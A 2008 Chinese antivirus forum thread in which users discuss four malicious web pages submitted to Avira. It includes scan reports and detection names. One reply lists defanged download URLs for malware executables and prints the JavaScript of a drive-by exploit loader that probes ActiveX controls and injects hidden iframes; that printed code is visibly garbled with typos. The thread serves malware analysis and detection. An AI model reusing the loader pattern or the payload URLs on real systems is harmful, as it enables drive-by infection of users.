红伞分析师花了36小时

显示全部楼层 · 发表于 2008-2-19 22:48:15

找艳照时遇到的，报HEUR/Exploit.HTML，上报，36小时后终于有了回复
File ID  Filename  Size (Byte) Result
3728694  1[1].htm  451 Byte  MALWARE
3728695  login[1].htm  7.86 KB  MALWARE
3728696  pstang[1].htm  6.51 KB  MALWARE
3728697  wm[1].htm  3.82 KB  MALWARE

[ 本帖最后由 hshhua01 于 2008-2-19 22:49 编辑 ]

显示全部楼层 · 发表于 2008-2-19 22:51:57

集体打瞌睡了。。

显示全部楼层 · 发表于 2008-2-19 23:00:13

HTM到底算不算毒

显示全部楼层 · 发表于 2008-2-19 23:01:30

我也纳闷了。

显示全部楼层 · 发表于 2008-2-19 23:03:52

第一个找到：

hxxp://iii.chsip.net/cat.exe
hxxp://iii.chsip.net/down.exe

第二第三个没啥发现，第四个，不知道上一层链接，找不到下载地址，对应源代码是

function init(){document.write();}

ry{var e;

var ado=(document.createElement("object"));

ado.setAttribute("classid","lsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var as=ado.createobject("Adodb.Stream""")}

catch(e){};

finally{

if(e!="[object Error]"){

document.write("<iframe wdth=0 height=0 src=06014.htm frameborder=0></iframe>");}

try{var f;var storm=new ctiveXObject("MPS.StormPlayer");}

catch(f){};

finally{if(f!="[object Error]"){

doument.write("<iframe width=0 height=0 src=yyfb.htm frameborder=0></iframe>");}}

tryvar g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}

catch(g){};

finlly{if(g!="[object Error]"){

document.write("<iframe width=0 height=0 src=pps.htm fameborder=0></iframe>");}}

try{var h;var pps=new ActiveXObject("GLCHAT.GLChatCtrl.1);}

catch(h){};

finally{if(h!="[object Error]"){

document.write("<iframe width=0 eight=0 src=lz.htm frameborder=0></iframe>");}}

try{var ii;var pps=new ActiveXObjec("Pdg2");}

catch(ii){};

finally{if(ii!="[object Error]"){

document.write("<iframewidth=0 height=0 src=cx.htm frameborder=0></iframe>");}}

document.write("<iframe idth=0 height=0 src=IENoRun.htm frameborder=0></iframe>");

document.write("<iframe idth=0 height=0 src=xunlei.htm frameborder=0></iframe>");

document.write("<iframe wdth=0 height=0 src=07004.htm frameborder=0></iframe>");

document.write("<iframe widh=0 height=0 src=0733.htm frameborder=0></iframe>");

document.write("<iframe width= height=0 src=baidu.htm frameborder=0></iframe>");

}

显示全部楼层 · 发表于 2008-2-19 23:14:37

The scan has been done completely.

   0 Scanning directories
   6 Files were scanned
   0 viruses and/or unwanted programs were found
   1 Files were classified as suspicious:
   0 files were deleted
   0 files were repaired
   1 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   6 Files not concerned
   1 Archives were scanned
   0 Warnings
   0 Notes

显示全部楼层 · 发表于 2008-2-20 00:10:06

其实有的真的会有格盘代码或这调用有害函数……
但几乎很多都是挂马……
然后那些马被我们的av砍掉……

显示全部楼层 · 发表于 2008-2-20 19:46:12

rising20.32.22未知！

显示全部楼层 · 发表于 2008-2-20 19:50:15

Starting the file scan:

Begin scan in 'E:\Antivir\4.rar'
E:\Antivir\4.rar
  [0] Archive type: RAR
  --> 1[1].htm
   [DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Age.RRR.451
  --> login[1].htm
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Click.DFG.8050
  --> pstang[1].htm
   [DETECTION] Contains detection pattern of the HTML script virus HTML/Click.TTT.6666
  --> wm[1].htm
   [DETECTION] Contains detection pattern of the Java script virus JS/Iframe.RRR.3911
   [WARNING] The file was ignored!

显示全部楼层 · 发表于 2008-2-20 19:51:20

---------------------------------------------------------
AVG Anti-Spyware - 扫描报告
---------------------------------------------------------

+ 创建时间: 19:52:43 2008-2-20

+ 扫描结果:

E:\Antivir\4.rar/wm[1].htm -> Downloader.Agent.ib : 未进行操作.

::报告结束

1

[病毒样本] 红伞分析师花了36小时

本帖子中包含更多资源

回复 3楼 spaceplane 的帖子

5/0

浏览过的版块